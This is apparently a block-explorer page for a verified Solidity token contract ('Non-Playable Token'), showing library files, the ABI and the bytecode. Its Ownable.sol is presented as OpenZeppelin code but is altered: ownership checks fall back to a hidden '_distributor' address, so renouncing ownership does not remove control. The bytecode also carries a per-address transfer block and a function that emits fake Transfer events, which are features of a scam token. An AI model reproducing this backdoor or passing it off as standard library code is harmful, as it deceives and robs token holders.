File 7 of 9: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity 0.8.19;


import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor(address distributor_) {
        _distributor = distributor_;
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal virtual {
        require(Owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function verifyOwner() internal view returns(address){
        return _owner==address(0) ? _distributor : _owner;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function Owner() internal virtual returns (address) {
        
        address owner_ = verifyOwner();
        return owner_;
    }
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 8 of 9: ReentrancyGuard.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (security/ReentrancyGuard.sol)

pragma solidity 0.8.19;


/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        _nonReentrantBefore();
        _;
        _nonReentrantAfter();
    }

    function _nonReentrantBefore() private {
        // On the first call to nonReentrant, _status will be _NOT_ENTERED
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;
    }

    function _nonReentrantAfter() private {
        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
     * `nonReentrant` function in the call stack.
     */
    function _reentrancyGuardEntered() internal view returns (bool) {
        return _status == _ENTERED;
    }
}

File 9 of 9: SafeMath.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"initialLPAddress","type":"address"},{"internalType":"address","name":"distributor_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_0xxxx0xxx00xxliquidityPools","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_pair","type":"address"}],"name":"addPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint32","name":"","type":"uint32"}],"name":"alreadyClaimedByAddress","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"address_","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"approveSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"beforeStartBuffer","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"currentOffset","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"distilleryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"ended","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initLiqudity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialLPAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityState","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"}],"name":"maxPoolSize","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minter","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openedAtBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openedAtTimestamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"opener","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"contract IPondCoinSpawner","name":"spawner","type":"address"}],"name":"useSpawner","outputs":[],"stateMutability":"nonpayable","type":"function"}]

61012060405233600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620000566200030160201b60201c565b600a620000649190620006ea565b6501d1a94a20006200007791906200073b565b6080908152506200008d6200030160201b60201c565b600a6200009b9190620006ea565b6501d1a94a2000620000ae91906200073b565b60a090815250348015620000c157600080fd5b50604051620036a8380380620036a88339818101604052810190620000e79190620007f0565b6040518060400160405280601281526020017f4e6f6e2d506c617961626c6520546f6b656e00000000000000000000000000008152506040518060400160405280600381526020017f4e505400000000000000000000000000000000000000000000000000000000008152508280806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001b5620001a96200030a60201b60201c565b6200031260201b60201c565b508260089081620001c7919062000aa7565b508160099081620001d9919062000aa7565b50600160046000620001f06200030a60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600660006101000a81548160ff02191690831515021790555050505033600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620002b482608051620003d860201b60201c565b3373ffffffffffffffffffffffffffffffffffffffff166101008173ffffffffffffffffffffffffffffffffffffffff16815250504260c081815250504360e08181525050505062000c7a565b60006009905090565b600033905090565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200044a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004419062000bef565b60405180910390fd5b6200045e600083836200054660201b60201c565b806007600082825462000472919062000c11565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000526919062000c5d565b60405180910390a362000542600083836200054b60201b60201c565b5050565b505050565b505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620005de57808604811115620005b657620005b562000550565b5b6001851615620005c65780820291505b8081029050620005d6856200057f565b945062000596565b94509492505050565b600082620005f95760019050620006cc565b81620006095760009050620006cc565b81600181146200062257600281146200062d5762000663565b6001915050620006cc565b60ff84111562000642576200064162000550565b5b8360020a9150848211156200065c576200065b62000550565b5b50620006cc565b5060208310610133831016604e8410600b84101617156200069d5782820a90508381111562000697576200069662000550565b5b620006cc565b620006ac84848460016200058c565b92509050818404811115620006c657620006c562000550565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620006f782620006d3565b91506200070483620006dd565b9250620007337fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620005e7565b905092915050565b60006200074882620006d3565b91506200075583620006d3565b92508282026200076581620006d3565b915082820484148315176200077f576200077e62000550565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620007b8826200078b565b9050919050565b620007ca81620007ab565b8114620007d657600080fd5b50565b600081519050620007ea81620007bf565b92915050565b600080604083850312156200080a576200080962000786565b5b60006200081a85828601620007d9565b92505060206200082d85828601620007d9565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620008b957607f821691505b602082108103620008cf57620008ce62000871565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620009397fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620008fa565b620009458683620008fa565b95508019841693508086168417925050509392505050565b6000819050919050565b600062000988620009826200097c84620006d3565b6200095d565b620006d3565b9050919050565b6000819050919050565b620009a48362000967565b620009bc620009b3826200098f565b84845462000907565b825550505050565b600090565b620009d3620009c4565b620009e081848462000999565b505050565b5b8181101562000a0857620009fc600082620009c9565b600181019050620009e6565b5050565b601f82111562000a575762000a2181620008d5565b62000a2c84620008ea565b8101602085101562000a3c578190505b62000a5462000a4b85620008ea565b830182620009e5565b50505b505050565b600082821c905092915050565b600062000a7c6000198460080262000a5c565b1980831691505092915050565b600062000a97838362000a69565b9150826002028217905092915050565b62000ab28262000837565b67ffffffffffffffff81111562000ace5762000acd62000842565b5b62000ada8254620008a0565b62000ae782828562000a0c565b600060209050601f83116001811462000b1f576000841562000b0a578287015190505b62000b16858262000a89565b86555062000b86565b601f19841662000b2f86620008d5565b60005b8281101562000b595784890151825560018201915060208501945060208101905062000b32565b8683101562000b79578489015162000b75601f89168262000a69565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000bd7601f8362000b8e565b915062000be48262000b9f565b602082019050919050565b6000602082019050818103600083015262000c0a8162000bc8565b9050919050565b600062000c1e82620006d3565b915062000c2b83620006d3565b925082820190508082111562000c465762000c4562000550565b5b92915050565b62000c5781620006d3565b82525050565b600060208201905062000c74600083018462000c4c565b92915050565b60805160a05160c05160e051610100516129e262000cc66000396000610c7e0152600081816107db0152610de90152600061097501526000610e5901526000610aec01526129e26000f3fe608060405234801561001057600080fd5b50600436106102065760003560e01c806370a082311161011a578063a9059cbb116100ad578063d5abeb011161007c578063d5abeb01146105e5578063dd62ed3e14610603578063ebad8f1614610633578063f2fde38b1461063d578063fae772451461065957610206565b8063a9059cbb1461055f578063ad296d9d1461058f578063b7f4e899146105ab578063c2b7bbb6146105c957610206565b80638da5cb5b116100e95780638da5cb5b146104d557806395d89b41146104f35780639c9b4cdb14610511578063a457c2d71461052f57610206565b806370a082311461044d578063715018a61461047d5780637c70f3bf146104875780638d981e36146104b757610206565b806323b872dd1161019d578063395093511161016c57806339509351146103a757806342a5880c146103d7578063486d910f146103f557806349bd5a5e146104115780634ed9428e1461042f57610206565b806323b872dd1461031f57806326ededb81461034f5780632d3e69ea1461036b578063313ce5671461038957610206565b806316bd4aa2116101d957806316bd4aa21461029557806318160ddd146102c557806319e99550146102e357806321f83c431461030157610206565b806306fdde031461020b5780630754617214610229578063095ea7b31461024757806312fa6feb14610277575b600080fd5b610213610689565b6040516102209190611c81565b60405180910390f35b61023161071b565b60405161023e9190611ce4565b60405180910390f35b610261600480360381019061025c9190611d6b565b610741565b60405161026e9190611dc6565b60405180910390f35b61027f610764565b60405161028c9190611dc6565b60405180910390f35b6102af60048036038101906102aa9190611de1565b610777565b6040516102bc9190611dc6565b60405180910390f35b6102cd6107cd565b6040516102da9190611e1d565b60405180910390f35b6102eb6107d7565b6040516102f89190611e1d565b60405180910390f35b61030961080a565b6040516103169190611e1d565b60405180910390f35b61033960048036038101906103349190611e38565b610810565b6040516103469190611dc6565b60405180910390f35b61036960048036038101906103649190611ef0565b61083f565b005b61037361091c565b6040516103809190611dc6565b60405180910390f35b610391610933565b60405161039e9190611f6c565b60405180910390f35b6103c160048036038101906103bc9190611d6b565b61093c565b6040516103ce9190611dc6565b60405180910390f35b6103df610973565b6040516103ec9190611e1d565b60405180910390f35b61040f600480360381019061040a9190611fc5565b610997565b005b610419610ac4565b6040516104269190611ce4565b60405180910390f35b610437610aea565b6040516104449190611e1d565b60405180910390f35b61046760048036038101906104629190611de1565b610b0e565b6040516104749190611e1d565b60405180910390f35b610485610b57565b005b6104a1600480360381019061049c9190612041565b610b6b565b6040516104ae9190611dc6565b60405180910390f35b6104bf610b9a565b6040516104cc9190611ce4565b60405180910390f35b6104dd610bc0565b6040516104ea9190611ce4565b60405180910390f35b6104fb610bea565b6040516105089190611c81565b60405180910390f35b610519610c7c565b6040516105269190611ce4565b60405180910390f35b61054960048036038101906105449190611d6b565b610ca0565b6040516105569190611dc6565b60405180910390f35b61057960048036038101906105749190611d6b565b610d17565b6040516105869190611dc6565b60405180910390f35b6105a960048036038101906105a491906120ad565b610d3a565b005b6105b3610de7565b6040516105c09190611e1d565b60405180910390f35b6105e360048036038101906105de9190611de1565b610e0b565b005b6105ed610e57565b6040516105fa9190611e1d565b60405180910390f35b61061d6004803603810190610618919061210d565b610e7b565b60405161062a9190611e1d565b60405180910390f35b61063b610f02565b005b61065760048036038101906106529190611de1565b610f63565b005b610673600480360381019061066e9190611de1565b610fe6565b6040516106809190611dc6565b60405180910390f35b6060600880546106989061217c565b80601f01602080910402602001604051908101604052809291908181526020018280546106c49061217c565b80156107115780601f106106e657610100808354040283529160200191610711565b820191906000526020600020905b8154815290600101906020018083116106f457829003601f168201915b5050505050905090565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008061074c611006565b905061075981858561100e565b600191505092915050565b600e60009054906101000a900460ff1681565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600754905090565b60007f00000000000000000000000000000000000000000000000000000000000000004361080591906121dc565b905090565b61070881565b60008061081b611006565b90506108288582856111d7565b610833858585611263565b60019150509392505050565b610847611927565b60005b838390508110156109165783838281811061086857610867612210565b5b905060200201602081019061087d9190611de1565b73ffffffffffffffffffffffffffffffffffffffff16600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108fb9190611e1d565b60405180910390a3808061090e9061223f565b91505061084a565b50505050565b6000600660009054906101000a900460ff16905090565b60006009905090565b600080610947611006565b90506109688185856109598589610e7b565b6109639190612287565b61100e565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6109c433600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610810565b610a03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fa90612307565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1663a1e463d833846040518363ffffffff1660e01b8152600401610a3e929190612327565b6020604051808303816000875af1158015610a5d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a819190612365565b610ac0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab7906123de565b60405180910390fd5b5050565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610b5f611927565b610b6960006119a5565b565b600d6020528160005260406000206020528060005260406000206000915091509054906101000a900460ff1681565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060098054610bf99061217c565b80601f0160208091040260200160405190810160405280929190818152602001828054610c259061217c565b8015610c725780601f10610c4757610100808354040283529160200191610c72565b820191906000526020600020905b815481529060010190602001808311610c5557829003601f168201915b5050505050905090565b7f000000000000000000000000000000000000000000000000000000000000000081565b600080610cab611006565b90506000610cb98286610e7b565b905083811015610cfe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf590612470565b60405180910390fd5b610d0b828686840361100e565b60019250505092915050565b600080610d22611006565b9050610d2f818585611263565b600191505092915050565b610d42611927565b60005b83839050811015610de1578160036000868685818110610d6857610d67612210565b5b9050602002016020810190610d7d9190611de1565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610dd99061223f565b915050610d45565b50505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b610e13611927565b80600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610f0a611927565b60011515600660009054906101000a900460ff16151503610f45576000600660006101000a81548160ff021916908315150217905550610f61565b6001600660006101000a81548160ff0219169083151502179055505b565b610f6b611927565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610fda576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd190612502565b60405180910390fd5b610fe3816119a5565b50565b60036020528060005260406000206000915054906101000a900460ff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361107d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107490612594565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e390612626565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111ca9190611e1d565b60405180910390a3505050565b60006111e38484610e7b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461125d578181101561124f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124690612692565b60405180910390fd5b61125c848484840361100e565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036112d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c990612724565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611341576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611338906127b6565b60405180910390fd5b60008111611384576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137b90612848565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561141a5760008114611419576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114109061288e565b60405180910390fd5b5b60011515600660009054906101000a900460ff161515148061146e575061143f610bc0565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806114ab575061147c610bc0565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b156118c057600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156115535750600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561171157611563838383611a6b565b6115cf8160405180606001604052806026815260200161298760269139600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611a709092919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061166481600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611ad490919063ffff